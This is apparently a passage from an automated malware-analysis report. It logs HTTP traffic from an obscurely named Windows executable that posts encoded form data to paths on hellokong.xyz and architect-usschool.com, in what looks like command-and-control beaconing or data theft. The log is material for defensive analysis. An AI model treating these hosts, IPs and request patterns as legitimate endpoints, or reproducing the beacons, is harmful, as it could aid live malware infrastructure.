                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.649748203.161.49.220805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:52:19.888699055 CEST1641OUTPOST /oui5/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.hellokong.xyz
                                                    Origin: http://www.hellokong.xyz
                                                    Referer: http://www.hellokong.xyz/oui5/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 66 44 7a 73 4b 2f 58 4a 79 61 32 75 51 38 4a 4d 67 47 67 6d 6c 51 39 33 41 4e 6e 7a 39 75 75 58 6d 79 4b 35 31 34 46 61 6f 71 6b 51 6c 78 45 41 4d 38 35 31 75 65 67 4d 37 62 4d 34 2f 53 4b 33 65 55 4a 42 45 4f 39 47 2b 62 68 41 35 4d 4f 53 34 78 35 56 66 48 55 43 46 53 69 6e 4b 5a 53 57 54 36 42 36 4c 44 6a 6b 4c 7a 57 75 37 78 77 49 50 4f 7a 52 71 53 4e 38 69 72 5a 65 73 6f 50 50 55 78 42 66 6d 31 36 35 47 43 65 6a 55 32 45 55 65 4a 54 6f 38 68 2f 36 50 71 6e 44 30 51 64 45 65 79 6e 47 38 31 74 7a 66 4c 47 51 76 69 36 69 6f 49 6a 41 4a 61 69 6f 31 78 69 42 56 70 4b 30 78 63 32 41 65 43 64 47 34 6d 59 6e 53 6b 41 6e 6c 34 2f 45 75 59 68 43 6b 67 64 44 63 74 4b 37 4b 30 6c 2f 74 30 38 51 49 56 76 48 46 35 6e 46 6e 6a 6d 37 35 62 52 49 43 31 33 76 74 2f 68 72 65 44 48 65 4e 69 33 7a 61 2f 57 4e 4d 67 7a 41 54 65 4e 45 32 68 4f 79 68 76 4f 61 6f 5a 78 31 47 64 73 68 76 77 5a 61 63 4e 77 6c 44 77 41 64 74 47 4c 42 4f 51 79 74 57 73 69 2f 5a 66 39 41 62 6f 53 41 57 31 51 4d 4f 64 [TRUNCATED]
                                                    Data Ascii: 7Dihs8p=fDzsK/XJya2uQ8JMgGgmlQ93ANnz9uuXmyK514FaoqkQlxEAM851uegM7bM4/SK3eUJBEO9G+bhA5MOS4x5VfHUCFSinKZSWT6B6LDjkLzWu7xwIPOzRqSN8irZesoPPUxBfm165GCejU2EUeJTo8h/6PqnD0QdEeynG81tzfLGQvi6ioIjAJaio1xiBVpK0xc2AeCdG4mYnSkAnl4/EuYhCkgdDctK7K0l/t08QIVvHF5nFnjm75bRIC13vt/hreDHeNi3za/WNMgzATeNE2hOyhvOaoZx1GdshvwZacNwlDwAdtGLBOQytWsi/Zf9AboSAW1QMOdtSrEK9sxt5ASVvjDcmP5rzz5NFGPhS68EykFgp0r9FcunPriiWK3edsumnM+gPbyYUN9Eevr89zbLWg2DUAkwD933LDx/q4rd/GCdqRwYF5JHEwFe1sSDXf5HsfipXWkJSeg8Eu06wJ49XDn/8fLq1K8VtqJf/L95WbkSwQzqXJHlmkf97Ei7+qDwKJtN2StA/UZcYEbyp92gWtacppU7bJZcxd+LHhI48wUmtybtGk0lXefICnaZxpPANDNy7QQTIFjPwjBgvsQy2FAAuPzEguIaS2pY0dI0eh4uU+3gMfcaITP1c8hAcrlscDkIuddLPV4u0d+/NPtMBidIoNWikx9dSGljCpKwtYIN9Gf50BDo+8OmvLBNNToOM+jCEez9AAc+6zCZ0U5GutXpqVjku7fA/lPliNoc0dWf5trz3nIWbi/xEQ0p5KU5eEvCs7noncoB/D/i8z1rKwGjHj8nLaJJDAnmHxjvDiutxCVFoNd9kRsqs42b5KQjl8rw0+PNPVlXXwz6EaHmgIhAeE0j8igLemBHFogIRcmzyyYrQwJAeWCD29Xc82kYX2qVLkboXklZsuQrcI0hikQ1JsKLfFuKyJgrzFqr4OilEk6mgx6B7PjMuIDt4K/228Kqaopmmdre3nPk2lnCzfpsLXZ43hCBbZzPI/aU6 [TRUNCATED]
                                                    Jul 3, 2024 17:52:20.507966042 CEST533INHTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:52:20 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.649749203.161.49.220805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:52:22.430128098 CEST345OUTGET /oui5/?7Dihs8p=SBbMJInblZiNUqJtj2t3oAZeaf7w1Mr63FaPzYR5npk3jTg+edZF9NME4tF9tViJCHx7c4tSq6N/qcOwzg98IChDG2ekcZOWcYJRK2znKimA3GQ/fbvAwxxdlKlVh8HBUwdv3Sg=&Bp=2LpD8tLh HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.hellokong.xyz
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:52:23.013477087 CEST548INHTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:52:22 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.649750217.160.0.84805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:52:28.345102072 CEST631OUTPOST /s24g/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.architect-usschool.com
                                                    Origin: http://www.architect-usschool.com
                                                    Referer: http://www.architect-usschool.com/s24g/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 31 70 67 46 4d 32 42 67 32 6f 53 6a 4c 6a 34 52 46 62 30 72 32 4d 6e 79 48 51 69 64 58 69 32 5a 6a 76 56 44 79 6e 4e 50 65 2b 52 50 59 78 44 5a 36 34 62 35 59 42 36 51 73 77 52 78 70 72 44 57 79 38 6c 50 4f 57 7a 2b 56 62 52 5a 32 30 41 62 38 4a 52 2b 52 79 45 4e 49 33 67 68 6c 37 57 56 2f 41 65 4a 6a 50 59 73 32 7a 38 73 53 69 44 35 6d 37 59 4e 44 64 54 6d 34 39 45 55 51 41 78 4a 45 4b 46 50 53 69 6e 34 5a 6a 33 33 54 56 2f 7a 4e 68 67 57 5a 65 47 72 37 4c 76 76 63 4d 66 2b 56 46 34 57 66 7a 4d 35 65 55 4e 71 59 4f 63 32 6b 43 69 52 71 2f 67 43 2f 51 74 6e 4d 33 51 36 33 5a 36 68 71 62 4e 53 4b 4f 39 50
                                                    Data Ascii: 7Dihs8p=1pgFM2Bg2oSjLj4RFb0r2MnyHQidXi2ZjvVDynNPe+RPYxDZ64b5YB6QswRxprDWy8lPOWz+VbRZ20Ab8JR+RyENI3ghl7WV/AeJjPYs2z8sSiD5m7YNDdTm49EUQAxJEKFPSin4Zj33TV/zNhgWZeGr7LvvcMf+VF4WfzM5eUNqYOc2kCiRq/gC/QtnM3Q63Z6hqbNSKO9P
                                                    Jul 3, 2024 17:52:29.391721010 CEST1236INHTTP/1.1 404 Not Found
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 03 Jul 2024 15:52:28 GMT
                                                    Server: Apache
                                                    X-Powered-By: PHP/8.2.20
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
                                                    Content-Encoding: gzip
                                                    Data Raw: 35 34 30 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed bd 5b 97 db 46 b2 2e f8 2c ff 0a 98 5a 2d 57 6d 13 e0 9d ac 2a a9 d4 23 cb 72 6f cf b1 2c 1f 4b ee 9e 3d 96 17 17 48 82 55 90 48 82 0d 90 75 b1 5a 3f e6 3c 9e 87 f3 b0 d7 79 9b c7 f1 1f 9b 2f 22 32 13 09 30 41 b2 2e b2 bd d7 1a 5d aa 48 20 2f 91 91 91 71 cb c8 c8 27 9f 4f 92 f1 ea 7a 19 79 e7 ab f9 ec e9 67 4f e8 97 37 0b 17 67 a7 b5 68 e1 ff f4 ba 46 cf a2 70 f2 f4 b3 07 4f e6 d1 2a f4 c6 e7 61 9a 45 ab d3 da 4f 6f be f1 8f f0 fa 81 7a b1 08 e7 d1 69 ed 22 8e 2e 97 49 ba aa 79 e3 64 b1 8a 16 28 78 19 4f 56 e7 a7 93 e8 22 1e 47 3e 7f a9 7b f1 22 5e c5 e1 cc cf c6 e1 2c 3a 6d 51 33 4f 66 f1 e2 bd 97 46 b3 d3 da 32 4d a6 f1 2c aa 79 e7 69 34 3d ad 9d af 56 cb 93 46 e3 6c be 3c 0b 92 f4 ac 71 35 5d 34 5a 52 67 15 af 66 d1 d3 1f c2 b3 c8 5b 24 2b 6f 9a ac 17 13 ef d1 c3 a3 76 ab f5 d8 7b 96 8e cf e3 55 34 5e 61 1c 4f 1a 52 f4 33 19 05 03 fb 45 9a 8c 92 55 f6 85 01 f5 8b 45 12 2f 26 d1 55 1d 8d 4d 93 d9 2c b9 fc c2 6b 00 01 06 b2 2f 26 8b cc 5f 02 a8 68 [TRUNCATED]
                                                    Data Ascii: 5402[F.,Z-Wm*#ro,K=HUHuZ?<y/"20A.]H /q'OzygO7ghFpO*aEOozi".Iyd(xOV"G>{"^,:mQ3OfF2M,yi4=VFl<q5]4ZRgf[$+ov{U4^aOR3EUE/&UM,k/&_h5>BX(.yd_:YQVQW@Mi-\.g8\fW^NkPGiu&&%%,'nLQQ+x bxRXXEW"yO><g2^.y.~V,NQE?UvDVotm4zonoQdgk5~!5qT;Pl3^=oK?^gW";](=W1<<Zq~UE(EBbLdw.KY=z{*wzILMV|yr.apYeh*I1AR?_>V)/^?%sG}hXHj#A{v(>;_=F={=Xx1n
                                                    Jul 3, 2024 17:52:29.391748905 CEST1236INData Raw: 75 4a 50 fe 14 2f 56 9d f6 b3 34 0d af 0f a2 e0 0c 30 11 79 00 f6 70 9f a6 83 09 0a 1e d6 d3 53 d4 bd 35 4c 0b 86 a9 7e 5f d0 1c 3e 4e a3 d5 3a 5d 78 ab 20 02 11 5c 1f 68 04 12 fa 0e 3f a8 97 d1 e9 e9 69 fa f3 ea 97 8f 87 39 82 d7 1a c1 d9 65 4c
                                                    Data Ascii: uJP/V40ypS5L~_>N:]x \h?i9eLG1(6gUqBQgiz5ofsp O@Fbuy44u'B_hD@=*51vQbmg}VU[tTzJOi>|S5R9S!gO-W
                                                    Jul 3, 2024 17:52:29.391766071 CEST1236INData Raw: c2 40 3f 12 a2 09 bf 05 37 80 a0 f7 3c 8a 56 5f 68 bc 8f 66 c9 f8 bd 3f 8b 47 69 98 5e 0b c6 d9 7b f1 85 f2 5e b8 cd 36 db 6a 6b 60 5a 1a c0 fa aa 51 68 4b ba 67 e3 0d 05 72 eb 6d 63 46 bd 79 34 89 c3 d3 2f b0 66 c4 01 91 d3 45 0a 96 97 c6 70 84
                                                    Data Ascii: @?7<V_hf?Gi^{^6jk`ZQhKgrmcFy4/fEp~)Fb>g)/Im"FM{yzJ!O<OQr|14?~>&58@i55?7>?nba^~J9*7dCOdK`PNhvQf8
                                                    Jul 3, 2024 17:52:29.391869068 CEST1236INData Raw: 8f d2 e8 20 88 33 10 17 45 54 f8 d3 59 74 75 f8 e1 2c 44 55 38 10 30 7b 8e 32 67 69 3c 29 96 21 0d d9 2b b4 92 5c 7a 4f bd 80 dd 4a b3 68 ba fa 30 9d 25 21 8c 38 fa fc 58 d9 75 ca c5 86 2d ab 94 cd bb e2 63 6c ce 80 84 08 80 ad 8d b3 71 a8 5b e7
                                                    Data Ascii: 3ETYtu,DU80{2gi<)!+\zOJh0%!8Xu-clq[/%GEU?m~^*32K)d(rqrHF C;~0v!&JN<xg+kx=Nh/ [X!`\~++2M?am!e5Aa6
                                                    Jul 3, 2024 17:52:29.391884089 CEST1236INData Raw: b9 ea 9a 10 be 0a 47 08 a3 a4 19 91 b9 81 13 96 72 30 e4 75 66 38 c9 94 2c 0a 2f 4d 3f 34 4d 74 98 c4 8d 30 6a 7e 44 47 62 c6 08 bd 1a e1 64 78 d5 ac a2 9c d5 8b 22 83 f1 3a 4d 89 a5 ca 1b 26 17 ab 10 c5 a0 12 9c 1a 94 7b 6a 9a d3 21 6c 69 6b 99
                                                    Data Ascii: Gr0uf8,/M?4Mt0j~DGbdx":M&{j!lik? @==Y`$"E@!{U>|cTE-Ub'Lrb[YI8{VlcEa'hWOB&[vpb8T+'ttlVE[[[GY<X
                                                    Jul 3, 2024 17:52:29.391906977 CEST1236INData Raw: 32 d2 7c a0 9b bf dd de cc 1e 7b 4b 70 4a 91 f7 7e 88 0c 08 11 ce 5f e7 53 f1 89 b6 cb ec ee ee 7b 50 f1 94 75 6f 9c 00 5a 71 4a 2a 7b 38 37 a6 2c d5 98 a6 24 bb ed fb 23 a2 f1 f9 6c 32 5c 9d cf 87 e3 e9 19 96 05 6f 67 58 73 b0 37 d0 6a 9b f2 3c
                                                    Data Ascii: 2|{KpJ~_S{PuoZqJ*{87,$#l2\ogXs7j<BJi^_m[w+pkhH -C=Scn@w\`&wM[@qkK_v+he+:CWKvw/cGZ^5kbY
                                                    Jul 3, 2024 17:52:29.391922951 CEST1236INData Raw: b8 8f 1e 36 3b 47 8f d5 a4 9e 52 de 64 79 82 20 70 b9 65 f9 2e 7b 3e f9 7e a0 84 1a 50 b2 6e e4 15 6d de 69 73 c4 34 aa f7 5f 69 df 9b 73 47 84 97 11 a2 c0 22 de e9 a1 07 ea 7b 69 0b 1c 5b f7 f7 b4 c9 29 83 9a 86 3e 9f 0a fa 1d 06 c5 fd dc 6d 38
                                                    Data Ascii: 6;GRdy pe.{>~Pnmis4_isG"{i[)>m8w-pw[h1/7NpFxDn;^]!QhK]AFWT ijO{~WpyRHMLQC,R8uM;1kqM=S8?{1W?mMrN
                                                    Jul 3, 2024 17:52:29.392400980 CEST1236INData Raw: 17 19 54 09 0c 04 98 e7 d6 bc f8 57 24 7d 8a 52 d0 ea e2 93 0e 53 78 35 39 19 70 e3 48 be 50 4a 88 06 64 a4 7b 24 de 33 c6 f8 76 7c 13 6e 4f ec d3 b8 7a e9 58 eb 04 74 b8 d9 45 b4 c0 2d 9f 60 83 18 32 f0 70 83 c9 c5 76 ee e6 f4 6e 3c d4 13 ac a9
                                                    Data Ascii: TW$}RSx59pHPJd{$3v|nOzXtE-`2pvn<Mo<)raBJ>TK&3<%MzlhnVV@#I${1e"rtaUE\gXG9=>gQ:f=;2utqx)#tUC83GS(cEEng
                                                    Jul 3, 2024 17:52:29.392419100 CEST1236INData Raw: 89 c3 c6 87 ab a6 4b 6c 3a cb 39 3d 0e 0e 50 24 19 ba 42 b3 e6 cc 3a ff 39 a8 55 b9 05 93 05 d2 f8 62 b7 39 02 23 46 0a 62 b7 9b 10 39 76 6c 8c 2a be 53 58 38 0e 58 49 1e 6a 53 56 88 a3 23 ce 7d ed 46 64 37 b0 51 ed e6 bf fd cf 55 02 44 43 10 c0
                                                    Data Ascii: Kl:9=P$B:9Ub9#Fb9vl*SX8XIjSV#}Fd7QUDC!k\TCUc7Tb7]GEAED6v He1tH\7VotU]zRYx(Q1yfB(.T#;hTl]UeQlvi~00x+
                                                    Jul 3, 2024 17:52:29.392435074 CEST1236INData Raw: 95 98 21 04 9b b1 7c a6 b3 e4 d2 4f b1 59 23 13 2e f2 70 2b fe 0c b6 b7 63 ce 70 3a 45 69 d4 ab 1d ab d7 e2 28 50 7a a8 9d 6c 46 7e 98 40 2e 25 c8 36 a8 5f 78 0b 72 39 d3 e5 49 9a 92 8d 8f dd 50 73 1f c1 be d4 81 9e 08 db 0e 70 e9 b2 54 56 e9 09
                                                    Data Ascii: !|OY#.p+cp:Ei(PzlF~@.%6_xr9IPspTV3U2532_W@BmVmA[1tAMZ6n7q##BtL{p<,q. /zAMS[]
                                                    Jul 3, 2024 17:52:29.397384882 CEST1236INData Raw: ce fc 84 68 41 ed af d2 a8 e9 24 3d 22 b5 39 b4 5f 4d 20 4e 50 f1 0e 2a e0 29 43 c6 b2 75 73 eb 88 18 3c 85 19 2f 26 e4 e5 3d ee 8e 07 c7 85 15 4d 7d ea 05 5f b5 69 61 b6 3c a4 7a 2e f3 ca fb 39 6a 69 69 66 47 a9 ce ed 22 38 ab 65 01 58 b0 84 0a
                                                    Data Ascii: hA$="9_M NP*)Cus</&=M}_ia<z.9jiifG"8eX`p8is=G#H7,q*LI^"Mf&PO$if+f:7ke/xu&o[LYrY@Zo=hg^lrivIS)Bs0>a3@TnE)sGJe


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.649751217.160.0.84805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:52:30.884514093 CEST655OUTPOST /s24g/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.architect-usschool.com
                                                    Origin: http://www.architect-usschool.com
                                                    Referer: http://www.architect-usschool.com/s24g/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 31 70 67 46 4d 32 42 67 32 6f 53 6a 4b 44 49 52 48 36 30 72 33 73 6e 39 49 77 69 64 42 53 32 64 6a 76 5a 44 79 6c 67 55 65 4d 46 50 5a 54 4c 5a 35 35 62 35 56 68 36 51 6b 51 52 30 32 62 43 55 79 38 70 74 4f 54 4c 2b 56 66 78 5a 32 77 45 62 38 65 46 2f 51 69 45 50 43 6e 67 6a 36 72 57 56 2f 41 65 4a 6a 50 4d 4b 32 7a 45 73 53 52 62 35 6d 66 45 4f 41 64 54 70 76 4e 45 55 55 41 77 43 45 4b 46 70 53 6d 75 54 5a 6d 7a 33 54 55 50 7a 63 51 67 56 44 4f 48 69 6b 62 75 75 4d 65 6a 30 58 31 74 6f 65 41 6b 4a 4b 47 64 39 55 59 64 73 34 78 69 79 34 76 41 41 2f 53 31 56 4d 58 51 51 31 5a 43 68 34 4d 42 31 46 36 59 73 34 74 68 55 41 76 74 59 75 78 6d 41 69 35 34 39 71 6b 48 6a 34 77 3d 3d
                                                    Data Ascii: 7Dihs8p=1pgFM2Bg2oSjKDIRH60r3sn9IwidBS2djvZDylgUeMFPZTLZ55b5Vh6QkQR02bCUy8ptOTL+VfxZ2wEb8eF/QiEPCngj6rWV/AeJjPMK2zEsSRb5mfEOAdTpvNEUUAwCEKFpSmuTZmz3TUPzcQgVDOHikbuuMej0X1toeAkJKGd9UYds4xiy4vAA/S1VMXQQ1ZCh4MB1F6Ys4thUAvtYuxmAi549qkHj4w==
                                                    Jul 3, 2024 17:52:32.832146883 CEST1236INHTTP/1.1 404 Not Found
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 03 Jul 2024 15:52:31 GMT
                                                    Server: Apache
                                                    X-Powered-By: PHP/8.2.20
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
                                                    Content-Encoding: gzip
                                                    Data Raw: 35 34 30 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed bd 5b 97 db 46 b2 2e f8 2c ff 0a 98 5a 2d 57 6d 13 e0 9d ac 2a a9 d4 23 cb 72 6f cf b1 2c 1f 4b ee 9e 3d 96 17 17 48 82 55 90 48 82 0d 90 75 b1 5a 3f e6 3c 9e 87 f3 b0 d7 79 9b c7 f1 1f 9b 2f 22 32 13 09 30 41 b2 2e b2 bd d7 1a 5d aa 48 20 2f 91 91 91 71 cb c8 c8 27 9f 4f 92 f1 ea 7a 19 79 e7 ab f9 ec e9 67 4f e8 97 37 0b 17 67 a7 b5 68 e1 ff f4 ba 46 cf a2 70 f2 f4 b3 07 4f e6 d1 2a f4 c6 e7 61 9a 45 ab d3 da 4f 6f be f1 8f f0 fa 81 7a b1 08 e7 d1 69 ed 22 8e 2e 97 49 ba aa 79 e3 64 b1 8a 16 28 78 19 4f 56 e7 a7 93 e8 22 1e 47 3e 7f a9 7b f1 22 5e c5 e1 cc cf c6 e1 2c 3a 6d 51 33 4f 66 f1 e2 bd 97 46 b3 d3 da 32 4d a6 f1 2c aa 79 e7 69 34 3d ad 9d af 56 cb 93 46 e3 6c be 3c 0b 92 f4 ac 71 35 5d 34 5a 52 67 15 af 66 d1 d3 1f c2 b3 c8 5b 24 2b 6f 9a ac 17 13 ef d1 c3 a3 76 ab f5 d8 7b 96 8e cf e3 55 34 5e 61 1c 4f 1a 52 f4 33 19 05 03 fb 45 9a 8c 92 55 f6 85 01 f5 8b 45 12 2f 26 d1 55 1d 8d 4d 93 d9 2c b9 fc c2 6b 00 01 06 b2 2f 26 8b cc 5f 02 a8 68 [TRUNCATED]
                                                    Data Ascii: 5402[F.,Z-Wm*#ro,K=HUHuZ?<y/"20A.]H /q'OzygO7ghFpO*aEOozi".Iyd(xOV"G>{"^,:mQ3OfF2M,yi4=VFl<q5]4ZRgf[$+ov{U4^aOR3EUE/&UM,k/&_h5>BX(.yd_:YQVQW@Mi-\.g8\fW^NkPGiu&&%%,'nLQQ+x bxRXXEW"yO><g2^.y.~V,NQE?UvDVotm4zonoQdgk5~!5qT;Pl3^=oK?^gW";](=W1<<Zq~UE(EBbLdw.KY=z{*wzILMV|yr.apYeh*I1AR?_>V)/^?%sG}hXHj#A{v(>;_=F={=Xx1n
                                                    Jul 3, 2024 17:52:32.832165956 CEST1236INData Raw: 75 4a 50 fe 14 2f 56 9d f6 b3 34 0d af 0f a2 e0 0c 30 11 79 00 f6 70 9f a6 83 09 0a 1e d6 d3 53 d4 bd 35 4c 0b 86 a9 7e 5f d0 1c 3e 4e a3 d5 3a 5d 78 ab 20 02 11 5c 1f 68 04 12 fa 0e 3f a8 97 d1 e9 e9 69 fa f3 ea 97 8f 87 39 82 d7 1a c1 d9 65 4c
                                                    Data Ascii: uJP/V40ypS5L~_>N:]x \h?i9eLG1(6gUqBQgiz5ofsp O@Fbuy44u'B_hD@=*51vQbmg}VU[tTzJOi>|S5R9S!gO-W
